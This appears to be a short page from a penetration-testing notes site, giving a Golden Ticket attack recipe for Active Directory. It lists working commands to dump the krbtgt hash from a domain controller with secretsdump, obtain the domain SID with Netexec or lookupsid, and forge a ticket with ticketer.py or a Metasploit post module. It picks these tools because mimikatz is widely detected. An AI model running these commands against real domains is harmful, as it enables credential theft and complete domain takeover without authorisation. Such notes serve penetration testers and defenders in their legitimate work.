Golden Ticket Attacks

When we compromise the krbtgt account, we own the domain. We can then request any resource or system on the domain. A Golden Ticket gives us complete access to every machine.

We can use Secretsdump and Netexec to get the information we need, as mimikatz is caught everywhere now:

Hashes

Secretsdump.py

krbtgt hash

We can dump the NTDS.dit to get the hash

$ secretsdump.py [domain]/[username]:'[password]'@[dc-ip] -just-dc-ntlm

Domain SID

Netexec

we can use the ldap protocol to get the domain SID:

$ nxc ldap [dc-ip] -u '[username]' -p '[password]' --get-sid

lookupsid.py

$ lookupsid.py -hashes '[hash]' '[domain]/[username]@[DC FQDN]' 0

Forge the Golden Ticket

$ ticketer.py -nthash "[krbtgtNThash]" -domain-sid "[domainSID]" -domain "[FQDN DOMAIN]" "[username]"

I was having trouble getting ticketer.py to generate the Golden Ticket, but I was able to generate and apply one to a session with Metasploit's module: post/windows/escalate/golden_ticket After getting a meterpreter session, background it, use this post module, fill in the options and set use to true before running.

Switch back to meterpreter session, use shell and then klist to list tickets

PreviousDumping the NTDS.dit NextPrintNightmare

Last updated 4 days ago